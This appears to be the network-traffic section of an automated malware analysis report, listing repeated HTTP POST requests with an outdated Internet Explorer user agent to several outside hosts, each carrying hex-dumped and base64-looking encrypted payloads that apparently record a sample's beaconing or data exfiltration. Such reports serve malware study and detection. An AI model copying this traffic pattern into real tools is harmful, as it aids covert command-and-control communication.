75 44 6e 4d 55 46 73 64 51 65 33 38 2f 59 47 33 67 7a 37 6d 4a 34 32 32 6d 4c 2f 63 2f 4e 45 32 43 32 37 54 48 42 75 74 74 6c 47 78 4f 6e 6a 2b 4d 45 4c 4f 6f 52 59 7a 6a 4f 2f 67 77 75 64 37 54 58 49 54 51 6c 43 2f 65 34 63 67 71 6b 44 4b 31 54 6b 4b 66 4c 73 6a 44 64 52 68 4e 51 35 41 76 58 71 42 76 73 32 59 52 46 78 61 71 51 37 52 50 63 4c 7a 56 30 64 32 4b 6d 55 56 54 65 37 47 66 73 63 75 70 35 6d 37 75 4e 70 46 31 57 63 4a 72 6c 58 66 6b 52 34 2b 52 33 36 72 6c 70 39 66 79 5a 43 51 4a 39 39 63 51 4e 41 49 75 53 33 76 71 35 38 54 6e 77 6b 58 2b 4b 75 68 2f 39 64 74 6e 57 31 35 56 70 6b 6d 4a 46 72 30 4e 59 53 73 41 55 50 52 68 53 5a 6c 5a 39 6c 58 44 6d 59 77 59 64 5a 4b 44 46 67 52 6f 4a 51 36 6a 57 56 46 47 75 5a 65 61 52 72 47 6c 41 7a 56 33 2b 2f 4e 58 44 34 76 66 5a 48 6b 7a 2b 62 70 2b 30 59 35 66 70 50 6d 70 31 47 30 50 52 78 59 77 78 62 41 37 65 2f 33 53 51 79 47 6a 47 45 64 51 3d 3d Data Ascii: 5fgDc6dFMQwrcBZ7Vgb/SXAqZ0Ydb9Lcy9Oq0wfvdc5M2fkud+e1UR8xT7NpevH+Vsp9Rloy/nkLuaDNFF8HK5Y06qKpvdt1bAXLP//IBj9N/66fH/DwTBaqH/hgnQ9n93kX2+PfHP+zPU9EHK0OERO5tETM2BHZs9Tk3YNuK67Xlm0fdVbnKz7fH+1NIVhb6oecxFHhpj4X38Ff3Itc9GvED3M8PBtHaY2GI6Kb45NrF//xuuDnMUFsdQe38/YG3gz7mJ422mL/c/NE2C27THButtlGxOnj+MELOoRYzjO/gwud7TXITQlC/e4cgqkDK1TkKfLsjDdRhNQ5AvXqBvs2YRFxaqQ7RPcLzV0d2KmUVTe7Gfscup5m7uNpF1WcJrlXfkR4+R36rlp9fyZCQJ99cQNAIuS3vq58TnwkX+Kuh/9dtnW15VpkmJFr0NYSsAUPRhSZlZ9lXDmYwYdZKDFgRoJQ6jWVFGuZeaRrGlAzV3+/NXD4vfZHkz+bp+0Y5fpPmp1G0PRxYwxbA7e/3SQyGjGEdQ==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 53 35 7a 75 38 70 72 4d 4a 41 79 35 6c 48 68 42 76 62 50 63 66 74 32 51 30 68 79 4b 65 43 44 78 62 6f 67 36 33 79 6d 6b 78 37 6b 47 4f 72 31 4b 57 6b 52 33 65 36 6e 70 35 74 56 48 61 39 4a 4c 50 30 51 72 6c 72 54 37 4d 30 4e 76 53 44 61 34 50 50 64 42 32 30 49 77 54 50 4b 64 70 44 37 2b 41 66 76 43 69 41 79 53 68 7a 52 50 4b 41 61 69 45 38 32 38 53 78 57 58 62 44 43 4a 59 4d 50 67 36 72 67 39 48 48 45 2f 75 54 4c 59 39 4a 30 33 48 78 4f 77 44 46 46 59 4d 39 4a 46 45 73 62 34 32 45 6e 59 61 65 44 44 76 69 49 52 56 78 4d 2b 59 58 41 68 62 31 55 34 4e 65 4b 33 34 56 32 6a 47 45 79 66 55 69 47 54 46 35 73 48 32 4c 68 69 52 70 36 2b 33 4b 47 6e 71 2f 55 68 6b 4e 68 58 41 2f 75 47 77 6e 78 4d 66 42 57 2b 44 62 71 6e 2f 6a 4b 44 77 31 53 57 4a 55 32 36 52 49 34 6e 67 44 76 2f 57 65 35 30 55 73 71 6d 4b 75 4d 52 62 37 33 39 35 34 4a 55 36 78 74 52 2f 51 74 34 4f 6c 46 30 6c 51 44 33 78 38 78 6e 36 35 34 36 69 30 42 45 4d 72 34 54 42 2b 44 7a 57 45 42 6a 50 43 42 42 65 76 4d 77 47 5a 48 61 30 69 52 56 75 62 31 76 69 6f 4b 2f 79 2b 51 6c 4f 38 32 78 62 42 6f 2b 78 41 39 57 66 62 4d 66 55 73 2f 64 2f 62 62 67 71 73 44 6f 38 6e 61 55 51 2b 4a 68 76 34 63 79 7a 41 48 52 69 31 4d 7a 4f 59 57 65 6f 41 36 57 37 73 54 53 73 4f 46 73 56 38 67 6d 62 52 75 63 30 5a 6b 46 44 2f 6d 47 51 7a 41 70 34 39 48 4a 54 68 73 45 31 58 35 56 51 39 6f 71 2b 78 33 41 34 54 4e 31 75 4d 51 75 54 66 55 34 6d 57 6c 6e 59 68 4e 73 58 43 6e 31 51 58 42 49 71 70 74 39 67 47 50 47 63 38 39 4e 68 59 70 54 59 76 55 4a 57 75 37 4a 48 65 48 4d 36 58 4b 6c 6b 39 38 59 74 47 4f 45 67 4a 74 69 34 62 31 35 74 34 38 54 34 69 4e 6f Data Ascii: S5zu8prMJAy5lHhBvbPcft2Q0hyKeCDxbog63ymkx7kGOr1KWkR3e6np5tVHa9JLP0QrlrT7M0NvSDa4PPdB20IwTPKdpD7+AfvCiAyShzRPKAaiE828SxWXbDCJYMPg6rg9HHE/uTLY9J03HxOwDFFYM9JFEsb42EnYaeDDviIRVxM+YXAhb1U4NeK34V2jGEyfUiGTF5sH2LhiRp6+3KGnq/UhkNhXA/uGwnxMfBW+Dbqn/jKDw1SWJU26RI4ngDv/We50UsqmKuMRb73954JU6xtR/Qt4OlF0lQD3x8xn6546i0BEMr4TB+DzWEBjPCBBevMwGZHa0iRVub1vioK/y+QlO82xbBo+xA9WfbMfUs/d/bbgqsDo8naUQ+Jhv4cyzAHRi1MzOYWeoA6W7sTSsOFsV8gmbRuc0ZkFD/mGQzAp49HJThsE1X5VQ9oq+x3A4TN1uMQuTfU4mWlnYhNsXCn1QXBIqpt9gGPGc89NhYpTYvUJWu7JHeHM6XKlk98YtGOEgJti4b15t48T4iNo
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 35 61 65 5a 38 79 44 53 4a 41 77 4b 47 68 55 34 63 31 34 6d 43 31 4e 69 49 6c 36 49 36 35 41 65 56 4a 4f 50 4e 6a 71 66 48 36 79 6a 48 69 63 58 69 73 36 49 72 36 35 37 6b 58 4d 42 4e 68 2f 77 56 2f 4e 5a 7a 39 31 6c 56 6f 6f 4a 4f 7a 46 56 4b 4f 32 72 6c 52 61 42 77 54 66 2b 37 35 2b 73 57 58 51 45 4d 42 58 59 52 6a 57 72 6b 6d 6d 57 46 37 35 35 36 79 4d 71 70 63 58 38 46 79 63 77 52 54 4e 51 61 41 49 4c 6b 50 41 4a 53 38 42 45 59 59 51 61 45 52 55 4c 72 66 79 34 56 57 56 4a 35 39 62 61 50 6f 74 41 73 75 71 59 66 31 67 69 2f 48 52 50 73 55 32 53 38 52 2f 48 56 52 35 4c 6e 55 6d 43 52 55 50 70 32 31 46 2b 36 71 69 61 47 63 75 6b 43 43 36 38 4b 54 35 5a 52 77 6f 7a 47 42 59 61 65 58 6b 70 4c 4e 69 71 47 43 58 62 51 53 45 55 65 48 74 37 59 32 41 79 54 34 33 54 6a 4a 65 66 75 2b 59 4d 2b 34 50 34 6e 4c 6e 71 2f 38 56 5a 41 36 77 33 74 41 36 44 36 4d 47 70 43 5a 45 76 39 33 42 47 63 39 48 4e 36 45 76 67 47 59 64 4a 43 6b 2b 4b 35 41 4b 4b 49 45 2b 48 72 71 43 63 4b 4b 51 55 31 75 59 4f 2b 78 34 71 70 72 6f 78 74 36 41 36 4c 33 69 35 4a 31 74 55 4d 45 50 41 73 69 69 55 64 39 4e 79 30 48 6c 7a 54 4f 43 63 58 52 56 38 74 56 6f 37 78 30 2b 74 6d 68 54 35 6f 6b 43 73 54 41 77 38 4e 73 51 62 52 31 50 48 50 73 30 64 4b 75 5a 57 64 54 45 62 31 4f 77 70 48 2b 6d 59 4d 50 56 53 6b 66 6f 58 57 59 72 6b 57 30 61 67 38 31 2b 64 4e 76 4e 4d 63 2b 66 43 4d 6b 65 6b 53 78 47 44 63 2b 4d 41 55 46 38 54 45 72 6f 58 75 72 64 50 53 42 33 65 4d 6a 44 42 45 5a 32 55 62 42 6e 49 50 6d 33 73 67 48 45 4c 6c 30 45 35 4b 4e 78 78 67 72 37 63 6a 4d 63 37 75 58 38 73 37 2b 43 4c 78 65 5a 74 35 66 56 51 4d 39 68 4d 31 58 45 42 77 50 48 30 68 52 36 6e 2f 41 3d 3d Data Ascii: 5aeZ8yDSJAwKGhU4c14mC1NiIl6I65AeVJOPNjqfH6yjHicXis6Ir657kXMBNh/wV/NZz91lVooJOzFVKO2rlRaBwTf+75+sWXQEMBXYRjWrkmmWF7556yMqpcX8FycwRTNQaAILkPAJS8BEYYQaERULrfy4VWVJ59baPotAsuqYf1gi/HRPsU2S8R/HVR5LnUmCRUPp21F+6qiaGcukCC68KT5ZRwozGBYaeXkpLNiqGCXbQSEUeHt7Y2AyT43TjJefu+YM+4P4nLnq/8VZA6w3tA6D6MGpCZEv93BGc9HN6EvgGYdJCk+K5AKKIE+HrqCcKKQU1uYO+x4qproxt6A6L3i5J1tUMEPAsiiUd9Ny0HlzTOCcXRV8tVo7x0+tmhT5okCsTAw8NsQbR1PHPs0dKuZWdTEb1OwpH+mYMPVSkfoXWYrkW0ag81+dNvNMc+fCMkekSxGDc+MAUF8TEroXurdPSB3eMjDBEZ2UbBnIPm3sgHELl0E5KNxxgr7cjMc7uX8s7+CLxeZt5fVQM9hM1XEBwPH0hR6n/A==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 67 32 74 56 53 78 70 66 70 41 78 41 69 74 38 75 50 53 4d 32 71 46 31 4c 73 4e 55 4b 50 5a 6c 39 37 67 49 74 41 31 64 7a 32 66 45 42 48 58 65 6e 52 52 4c 4d 39 6a 4c 72 73 30 4d 36 74 72 49 63 75 45 4f 52 50 68 4c 47 32 66 72 59 6b 6b 31 62 37 33 6e 38 61 79 5a 34 79 42 64 2f 68 56 71 6b 34 66 59 39 6d 42 4d 4b 59 66 5a 44 74 2b 56 4a 32 64 73 53 47 2b 65 39 63 38 63 6d 55 61 55 34 6d 78 71 50 41 4e 66 51 39 69 30 6e 59 43 2f 50 52 6a 52 62 6a 4e 2f 69 77 68 56 77 47 69 42 4c 5a 77 44 63 32 73 4f 36 42 46 2b 39 50 34 55 69 67 57 2f 36 6a 34 53 79 44 51 69 55 75 4b 48 78 66 42 37 6b 66 41 72 4c 45 48 35 70 35 54 44 2b 4e 44 41 33 46 75 4b 68 4e 7a 4e 52 62 74 55 67 69 31 35 39 44 5a 6f 79 56 67 70 77 6a 64 54 31 42 64 6f 5a 4d 2b 30 4d 35 44 57 45 45 44 6b 37 77 71 41 45 67 51 61 79 54 6b 71 2f 72 35 4c 61 4d 55 65 55 46 54 4e 76 43 2f 74 52 56 6d 4a 4a 32 74 6e 62 39 55 38 75 62 39 68 2f 43 66 54 6d 4d 6c 39 42 2b 45 61 54 4f 4b 2b 30 46 69 50 49 42 59 59 71 43 58 72 6d 4b 55 72 39 6f 65 69 52 49 52 59 4d 62 68 6d 6b 43 67 49 48 56 4b 71 4d 6e 55 51 47 49 70 74 74 57 48 30 45 72 31 4a 77 54 55 57 7a 32 2b 76 57 79 75 56 49 56 58 73 38 78 41 79 63 37 4e 32 37 76 4c 4d 73 61 53 59 4a 32 67 50 7a 76 6f 5a 61 48 4b 4c 48 51 47 34 4d 6a 58 67 79 73 56 6a 6c 42 74 4d 59 4a 72 30 33 61 6d 62 56 6d 33 70 76 75 63 51 2f 53 71 44 55 2f 63 75 38 58 34 4f 33 6b 4c 34 57 6f 37 54 66 62 46 6e 49 4c 57 44 4b 51 4d 30 65 69 7a 51 67 49 54 36 52 6a 6e 32 6c 74 55 78 6b 64 70 67 55 61 42 41 6e 72 51 45 69 66 71 77 4c 63 67 79 64 68 36 33 50 6e 6d 43 59 48 61 6b 32 75 65 63 45 47 71 35 52 33 4a 70 59 32 39 2b 79 31 71 6f 58 Data Ascii: g2tVSxpfpAxAit8uPSM2qF1LsNUKPZl97gItA1dz2fEBHXenRRLM9jLrs0M6trIcuEORPhLG2frYkk1b73n8ayZ4yBd/hVqk4fY9mBMKYfZDt+VJ2dsSG+e9c8cmUaU4mxqPANfQ9i0nYC/PRjRbjN/iwhVwGiBLZwDc2sO6BF+9P4UigW/6j4SyDQiUuKHxfB7kfArLEH5p5TD+NDA3FuKhNzNRbtUgi159DZoyVgpwjdT1BdoZM+0M5DWEEDk7wqAEgQayTkq/r5LaMUeUFTNvC/tRVmJJ2tnb9U8ub9h/CfTmMl9B+EaTOK+0FiPIBYYqCXrmKUr9oeiRIRYMbhmkCgIHVKqMnUQGIpttWH0Er1JwTUWz2+vWyuVIVXs8xAyc7N27vLMsaSYJ2gPzvoZaHKLHQG4MjXgysVjlBtMYJr03ambVm3pvucQ/SqDU/cu8X4O3kL4Wo7TfbFnILWDKQM0eizQgIT6Rjn2ltUxkdpgUaBAnrQEifqwLcgydh63PnmCYHak2uecEGq5R3JpY29+y1qoX
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 31 63 64 4f 74 4c 30 49 79 51 77 4f 6f 66 65 33 64 4c 4b 55 31 76 62 62 67 74 76 72 42 67 76 4f 51 58 55 4f 46 6a 69 74 71 38 30 44 35 6e 62 37 38 6d 48 70 6b 6b 4f 48 54 66 71 68 36 72 79 37 6b 70 6f 7a 63 77 39 69 74 6e 79 47 31 58 4d 76 46 65 68 32 34 36 50 31 65 58 4d 73 6e 59 57 62 47 6c 53 70 6a 38 65 53 6c 4a 68 31 2b 54 42 66 33 37 4c 43 57 67 78 32 78 69 49 4b 79 6b 59 4a 4a 41 43 6b 37 52 64 52 53 39 45 56 48 52 36 50 69 34 75 36 39 55 2f 2b 45 34 52 34 53 65 74 62 32 4d 50 34 66 70 51 55 37 47 46 39 54 56 71 4f 33 2f 47 62 66 36 49 48 59 41 68 63 62 39 51 72 63 76 5a 48 77 7a 58 57 75 6a 46 64 69 74 47 39 37 7a 66 55 72 6b 51 4f 34 38 41 72 67 4a 4a 73 53 4b 6d 74 53 46 5a 77 52 6e 36 62 65 74 76 4a 72 37 75 31 78 59 52 30 4c 63 53 51 57 63 77 31 71 6f 31 41 7a 57 6d 51 39 4d 73 78 73 68 47 4c 53 35 2b 4c 59 65 41 78 39 35 4e 74 76 74 31 75 6a 52 48 63 66 2b 61 6d 70 32 47 53 74 47 46 4a 64 58 6a 78 31 43 4f 64 66 48 74 77 31 64 73 48 33 77 6f 72 49 31 45 57 48 74 4a 72 4b 63 4d 2f 73 72 48 43 4e 69 4f 6a 65 6b 4f 78 4d 43 42 58 36 65 71 73 48 6a 47 79 35 4d 48 65 75 68 5a 38 56 4b 6c 63 45 66 31 4e 4e 36 58 62 53 44 34 6d 74 63 71 45 74 6a 33 63 47 71 66 41 54 36 4b 64 75 4b 7a 69 79 56 66 46 63 46 43 62 65 6c 69 6f 74 34 41 34 6f 72 36 61 49 32 6c 67 74 61 4c 7a 73 33 50 31 67 79 35 4b 6a 58 43 51 79 6f 75 42 71 6a 73 38 38 30 38 45 73 62 56 35 68 32 62 51 55 36 48 7a 4b 61 58 34 4a 58 68 63 4a 59 32 4c 48 55 76 49 7a 66 2b 4b 4c 75 6a 6e 56 4f 31 46 6e 66 78 6d 72 46 2b 48 78 59 76 50 32 2b 36 49 46 6e 4d 6a 78 74 71 6d 48 43 57 6a 6b 48 54 61 79 37 72 47 71 61 6c 76 4a 62 35 66 30 37 4a 65 69 75 71 6d 6f 43 4e 79 6c 59 6a 2f 75 79 6c 33 35 48 6b 43 56 41 62 53 4f 30 34 36 64 54 76 79 42 79 56 70 62 34 55 3d Data Ascii: 1cdOtL0IyQwOofe3dLKU1vbbgtvrBgvOQXUOFjitq80D5nb78mHpkkOHTfqh6ry7kpozcw9itnyG1XMvFeh246P1eXMsnYWbGlSpj8eSlJh1+TBf37LCWgx2xiIKykYJJACk7RdRS9EVHR6Pi4u69U/+E4R4Setb2MP4fpQU7GF9TVqO3/Gbf6IHYAhcb9QrcvZHwzXWujFditG97zfUrkQO48ArgJJsSKmtSFZwRn6betvJr7u1xYR0LcSQWcw1qo1AzWmQ9MsxshGLS5+LYeAx95Ntvt1ujRHcf+amp2GStGFJdXjx1COdfHtw1dsH3worI1EWHtJrKcM/srHCNiOjekOxMCBX6eqsHjGy5MHeuhZ8VKlcEf1NN6XbSD4mtcqEtj3cGqfAT6KduKziyVfFcFCbeliot4A4or6aI2lgtaLzs3P1gy5KjXCQyouBqjs8808EsbV5h2bQU6HzKaX4JXhcJY2LHUvIzf+KLujnVO1FnfxmrF+HxYvP2+6IFnMjxtqmHCWjkHTay7rGqalvJb5f07JeiuqmoCNylYj/uyl35HkCVAbSO046dTvyByVpb4U=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 67 32 74 56 53 78 70 66 70 41 78 41 69 74 38 75 50 53 4d 32 71 46 31 4c 73 4e 55 4b 50 5a 6c 39 37 67 49 74 41 31 64 7a 32 66 45 42 48 58 65 6e 52 52 4c 4d 39 6a 4c 72 73 30 4d 36 74 72 49 63 75 45 4f 52 50 68 4c 47 32 66 72 59 6b 6b 31 62 37 33 6e 38 61 79 5a 34 79 42 64 2f 68 56 71 6b 34 66 59 39 6d 42 4d 4b 59 66 5a 44 74 2b 56 4a 32 64 73 53 47 2b 65 39 63 38 63 6d 55 61 55 34 6d 78 71 50 41 4e 66 51 39 69 30 6e 59 43 2f 50 52 6a 52 62 6a 4e 2f 69 77 68 56 77 47 69 42 4c 5a 77 44 63 32 73 4f 36 42 46 2b 39 50 34 55 69 67 57 2f 36 6a 34 53 79 44 51 69 55 75 4b 48 78 66 42 37 6b 66 41 72 4c 45 48 35 70 35 54 44 2b 4e 44 41 33 46 75 4b 68 4e 7a 4e 52 62 74 55 67 69 31 35 39 44 5a 6f 79 56 67 70 77 6a 64 54 31 42 64 6f 5a 4d 2b 30 4d 35 44 57 45 45 44 6b 37 77 71 41 45 67 51 61 79 54 6b 71 2f 72 35 4c 61 4d 55 65 55 46 54 4e 76 43 2f 74 52 56 6d 4a 4a 32 74 6e 62 39 55 38 75 62 39 68 2f 43 66 54 6d 4d 6c 39 42 2b 45 61 54 4f 4b 2b 30 46 69 50 49 42 59 59 71 43 58 72 6d 4b 55 72 39 6f 65 69 52 49 52 59 4d 62 68 6d 6b 43 67 49 48 56 4b 71 4d 6e 55 51 47 49 70 74 74 57 48 30 45 72 31 4a 77 54 55 57 7a 32 2b 76 57 79 75 56 49 56 58 73 38 78 41 79 63 37 4e 32 37 76 4c 4d 73 61 53 59 4a 32 67 50 7a 76 6f 5a 61 48 4b 4c 48 51 47 34 4d 6a 58 67 79 73 56 6a 6c 42 74 4d 59 4a 72 30 33 61 6d 62 56 6d 33 70 76 75 63 51 2f 53 71 44 55 2f 63 75 38 58 34 4f 33 6b 4c 34 57 6f 37 54 66 62 46 6e 49 4c 57 44 4b 51 4d 30 65 69 7a 51 67 49 54 36 52 6a 6e 32 6c 74 55 78 6b 64 70 67 55 61 42 41 6e 72 51 45 69 66 71 77 4c 63 67 79 64 68 36 33 50 6e 6d 43 59 48 61 6b 32 75 65 63 45 47 71 35 52 33 4a 70 59 32 39 2b 79 31 71 6f 58 Data Ascii: g2tVSxpfpAxAit8uPSM2qF1LsNUKPZl97gItA1dz2fEBHXenRRLM9jLrs0M6trIcuEORPhLG2frYkk1b73n8ayZ4yBd/hVqk4fY9mBMKYfZDt+VJ2dsSG+e9c8cmUaU4mxqPANfQ9i0nYC/PRjRbjN/iwhVwGiBLZwDc2sO6BF+9P4UigW/6j4SyDQiUuKHxfB7kfArLEH5p5TD+NDA3FuKhNzNRbtUgi159DZoyVgpwjdT1BdoZM+0M5DWEEDk7wqAEgQayTkq/r5LaMUeUFTNvC/tRVmJJ2tnb9U8ub9h/CfTmMl9B+EaTOK+0FiPIBYYqCXrmKUr9oeiRIRYMbhmkCgIHVKqMnUQGIpttWH0Er1JwTUWz2+vWyuVIVXs8xAyc7N27vLMsaSYJ2gPzvoZaHKLHQG4MjXgysVjlBtMYJr03ambVm3pvucQ/SqDU/cu8X4O3kL4Wo7TfbFnILWDKQM0eizQgIT6Rjn2ltUxkdpgUaBAnrQEifqwLcgydh63PnmCYHak2uecEGq5R3JpY29+y1qoX
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 33 33 57 56 45 4d 78 49 37 51 79 73 39 42 2b 54 4e 2b 31 6f 69 39 2b 46 76 6c 61 6b 4a 65 7a 53 77 41 5a 37 72 6e 41 6f 4e 71 37 4c 44 33 36 57 58 2b 53 6b 4c 77 38 64 6c 57 4b 57 74 46 33 72 6f 44 75 77 62 35 41 57 2b 69 36 79 50 6a 44 46 61 53 65 36 33 32 44 45 36 4f 6f 70 2f 57 32 70 45 77 61 45 58 59 6e 4c 39 52 77 54 32 37 39 57 71 36 61 65 43 61 50 72 4c 46 37 41 44 50 39 2b 59 45 35 62 65 77 77 63 4e 75 53 50 70 39 31 55 4f 70 63 61 72 79 6f 78 52 45 77 43 6c 6c 49 50 6c 65 57 72 74 31 47 41 38 53 30 79 6f 31 73 4b 6b 4f 6f 6d 6c 69 68 36 6e 2b 6b 64 33 49 4f 44 35 78 35 6e 4e 52 39 31 56 2f 77 4f 2f 56 4d 4c 49 57 59 75 67 41 6c 73 44 75 4b 47 6c 4b 2b 43 58 76 48 39 65 49 48 69 37 61 4f 6d 6d 76 57 79 53 4a 6f 74 66 47 48 41 31 6b 32 51 57 2b 39 77 41 4f 58 4c 50 57 73 73 47 59 66 68 4e 6a 43 43 44 6d 38 57 38 70 6d 55 77 66 47 4e 58 75 58 6a 36 53 30 79 64 6d 32 76 6a 6d 36 73 50 54 37 6f 2b 2b 30 39 4e 6f 33 44 57 57 65 7a 6c 71 4e 31 77 72 4a 6d 66 72 4c 54 61 74 79 55 2f 38 48 52 64 57 71 6e 6a 43 41 6a 44 45 52 39 76 33 75 43 49 41 41 4f 61 57 56 66 79 57 54 34 30 4b 65 4a 33 6d 71 4b 77 66 52 50 6a 73 67 36 59 4d 34 42 52 6c 77 56 71 56 48 45 47 71 36 77 37 41 6b 53 38 52 4c 45 6b 50 62 4f 71 41 5a 45 6c 75 6d 30 39 53 63 4a 37 4e 38 4a 4a 35 51 50 6b 41 6a 38 6a 48 51 74 6c 42 6c 55 35 2b 6b 67 79 64 56 39 2b 30 43 53 30 4b 2b 37 50 78 6e 2f 47 45 65 6f 6f 77 31 32 59 2f 41 6f 75 56 4b 72 4b 79 6a 57 76 30 39 51 4d 41 36 39 77 6b 38 2b 47 49 69 75 6d 37 65 52 63 55 37 30 41 33 4e 32 72 76 61 72 65 4b 34 55 2b 68 34 6b 55 53 31 30 76 49 48 57 6d 79 34 44 70 42 53 31 36 76 52 59 64 39 2f 6c 44 75 33 6c 45 38 45 39 64 31 51 7a 6e 54 68 5a 57 5a 6c 67 6e 34 63 58 59 69 69 59 74 35 6d 52 4b 32 63 72 2f 54 77 3d Data Ascii: 33WVEMxI7Qys9B+TN+1oi9+FvlakJezSwAZ7rnAoNq7LD36WX+SkLw8dlWKWtF3roDuwb5AW+i6yPjDFaSe632DE6Oop/W2pEwaEXYnL9RwT279Wq6aeCaPrLF7ADP9+YE5bewwcNuSPp91UOpcaryoxREwCllIPleWrt1GA8S0yo1sKkOomlih6n+kd3IOD5x5nNR91V/wO/VMLIWYugAlsDuKGlK+CXvH9eIHi7aOmmvWySJotfGHA1k2QW+9wAOXLPWssGYfhNjCCDm8W8pmUwfGNXuXj6S0ydm2vjm6sPT7o++09No3DWWezlqN1wrJmfrLTatyU/8HRdWqnjCAjDER9v3uCIAAOaWVfyWT40KeJ3mqKwfRPjsg6YM4BRlwVqVHEGq6w7AkS8RLEkPbOqAZElum09ScJ7N8JJ5QPkAj8jHQtlBlU5+kgydV9+0CS0K+7Pxn/GEeoow12Y/AouVKrKyjWv09QMA69wk8+GIium7eRcU70A3N2rvareK4U+h4kUS10vIHWmy4DpBS16vRYd9/lDu3lE8E9d1QznThZWZlgn4cXYiiYt5mRK2cr/Tw=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 4d 45 30 69 76 6d 78 61 79 51 78 77 55 79 64 34 56 35 49 37 38 58 2b 6f 57 35 44 45 70 31 4b 39 59 46 71 6f 49 73 35 2f 73 64 57 54 53 5a 6b 30 78 70 6c 34 2f 36 4f 62 33 52 73 6d 4c 78 50 43 6d 39 72 51 2f 70 49 67 30 55 4e 6e 57 57 47 42 48 68 46 4b 6f 72 30 5a 39 64 79 33 6b 49 70 41 6c 4f 5a 51 35 50 74 39 79 4b 30 50 6d 5a 33 66 6d 6a 4f 6d 69 4c 5a 64 41 31 58 36 68 48 51 79 4a 36 4a 77 2f 64 52 31 38 52 34 2b 63 76 6f 41 5a 6f 45 57 66 74 2b 68 61 41 4d 50 2f 75 30 61 63 49 36 57 6a 34 31 46 71 53 57 58 37 64 72 7a 41 72 37 65 6e 44 55 6d 47 5a 78 70 64 54 6c 30 78 64 2b 57 7a 48 30 70 71 73 69 53 70 6d 37 65 74 6a 79 4b 37 66 41 43 66 61 52 67 4c 4e 46 46 2b 39 34 76 44 38 6a 35 32 49 36 33 33 71 34 55 6e 46 51 37 64 68 36 45 71 31 49 37 39 30 65 30 58 6b 5a 47 38 54 55 78 65 6a 47 48 50 77 4c 6f 2f 37 7a 78 41 38 31 4e 4c 44 4c 61 74 6f 4f 44 4f 34 6c 68 6c 63 47 66 37 55 4d 53 77 36 64 77 68 56 44 57 50 4a 47 76 2b 44 6a 72 4e 59 66 4e 48 36 6b 70 54 55 5a 6c 53 32 52 30 6e 59 7a 48 50 65 64 30 30 34 2f 4c 6c 53 78 31 32 59 57 72 72 52 63 69 59 71 75 73 57 59 76 34 68 51 51 56 43 46 48 58 65 6d 6a 38 42 4a 4b 62 69 32 6e 67 30 33 42 4f 64 6b 5a 77 77 74 42 31 73 6f 57 49 70 63 5a 66 58 37 4c 4d 42 36 69 4b 57 30 6e 51 6a 78 34 48 41 58 4e 33 49 6a 33 75 2f 55 54 51 63 52 30 37 4a 56 74 48 65 74 48 6c 4c 45 38 46 41 31 47 39 59 30 31 66 78 44 47 51 37 4e 30 43 4c 52 72 34 49 73 42 69 4a 35 7a 56 32 2b 53 4f 35 75 51 6c 38 53 61 32 66 56 54 6c 4e 75 66 5a 64 52 64 41 42 6f 31 4a 30 50 33 38 4e 4a 39 54 47 77 6c 77 56 34 4b 2f 59 45 31 35 78 31 30 66 4f 45 70 55 6b 62 68 73 31 59 6f 58 55 69 52 30 36 30 35 79 4c 36 44 6d 66 38 33 37 56 72 52 6c 6b 79 62 6b 41 58 46 46 5a 42 64 31 71 4f 2f 75 6f 7a 66 64 48 69 32 7a 79 64 41 3d Data Ascii: ME0ivmxayQxwUyd4V5I78X+oW5DEp1K9YFqoIs5/sdWTSZk0xpl4/6Ob3RsmLxPCm9rQ/pIg0UNnWWGBHhFKor0Z9dy3kIpAlOZQ5Pt9yK0PmZ3fmjOmiLZdA1X6hHQyJ6Jw/dR18R4+cvoAZoEWft+haAMP/u0acI6Wj41FqSWX7drzAr7enDUmGZxpdTl0xd+WzH0pqsiSpm7etjyK7fACfaRgLNFF+94vD8j52I633q4UnFQ7dh6Eq1I790e0XkZG8TUxejGHPwLo/7zxA81NLDLatoODO4lhlcGf7UMSw6dwhVDWPJGv+DjrNYfNH6kpTUZlS2R0nYzHPed004/LlSx12YWrrRciYqusWYv4hQQVCFHXemj8BJKbi2ng03BOdkZwwtB1soWIpcZfX7LMB6iKW0nQjx4HAXN3Ij3u/UTQcR07JVtHetHlLE8FA1G9Y01fxDGQ7N0CLRr4IsBiJ5zV2+SO5uQl8Sa2fVTlNufZdRdABo1J0P38NJ9TGwlwV4K/YE15x10fOEpUkbhs1YoXUiR0605yL6Dmf837VrRlkybkAXFFZBd1qO/uozfdHi2zydA=
